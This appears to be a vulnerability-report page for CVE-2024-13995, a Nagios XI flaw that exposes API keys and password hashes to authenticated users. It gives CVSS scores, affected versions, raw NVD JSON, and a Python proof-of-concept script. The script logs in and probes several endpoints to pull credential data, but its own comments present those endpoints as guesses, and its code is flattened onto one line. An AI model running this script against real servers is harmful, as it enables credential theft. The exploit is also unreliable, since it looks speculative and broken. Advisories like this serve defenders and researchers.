Security Vulnerability Report
中文
CVE-2024-13995 CVSS 8.8 HIGH

CVE-2024-13995

Published: 2025-10-30 22:15:45
Last Modified: 2025-11-06 16:18:00
Source: [email protected]

Description

Nagios XI versions prior to 2024R1.1.2 may (confirmed in 2024R1.1 and 2024R1.1.1) disclose sensitive user account information (including API keys and hashed passwords) to authenticated users who should not have access to that data. Exposure of API keys or password hashes could lead to account compromise, abuse of API privileges, or offline cracking attempts.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:* - VULNERABLE
Nagios XI < 2024R1.1.2
Nagios XI 2024R1.1 (确认受影响)
Nagios XI 2024R1.1.1 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2024-13995 PoC - Nagios XI Authenticated Information Disclosure Note: This PoC is for educational and authorized testing purposes only. """ import requests import json import sys from urllib.parse import urljoin def exploit_nagios_xi_info_disclosure(target_url, username, password): """ Exploit CVE-2024-13995 to extract sensitive user information including API keys and password hashes """ session = requests.Session() # Step 1: Login to Nagios XI login_url = urljoin(target_url, '/nagiosxi/login.php') login_data = { 'username': username, 'password': password, 'loginButton': 'Login' } print(f'[*] Attempting login to {target_url}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'nagiosxi' not in session.cookies.get_dict() and 'nagiosxi' not in response.text.lower(): print('[-] Login failed') return None print('[+] Login successful') # Step 2: Extract user information via API endpoint # Common endpoint that may leak information api_endpoints = [ '/nagiosxi/api/v1/objects/userinfo', '/nagiosxi/api/v1/system/userlist', '/nagiosxi/admin/users.php?expand=1', '/nagiosxi/includes/components/profile-manager/getuserinfo.php' ] sensitive_data = [] for endpoint in api_endpoints: try: url = urljoin(target_url, endpoint) response = session.get(url, timeout=10) if response.status_code == 200: # Look for sensitive fields text = response.text if 'api_key' in text.lower() or 'password_hash' in text.lower() or 'hash' in text.lower(): print(f'[+] Found potential sensitive data at {endpoint}') # Try to parse JSON response try: data = response.json() sensitive_data.append({'endpoint': endpoint, 'data': data}) except: sensitive_data.append({'endpoint': endpoint, 'data': text}) except Exception as e: print(f'[-] Error accessing {endpoint}: {e}') return sensitive_data if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python3 cve-2024-13995-poc.py <target_url> <username> <password>') print('Example: python3 cve-2024-13995-poc.py http://nagios-server.local admin nagios') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] results = exploit_nagios_xi_info_disclosure(target, user, pwd) if results: print('\n[+] Sensitive Information Found:') print(json.dumps(results, indent=2)) else: print('[-] No sensitive information extracted or target not vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-13995", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:44.903", "lastModified": "2025-11-06T16:17:59.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.1.2 may (confirmed in 2024R1.1 and 2024R1.1.1) disclose sensitive user account information (including API keys and hashed passwords) to authenticated users who should not have access to that data. Exposure of API keys or password hashes could lead to account compromise, abuse of API privileges, or offline cracking attempts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-api-keys-and-hashed-password-authenticated-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.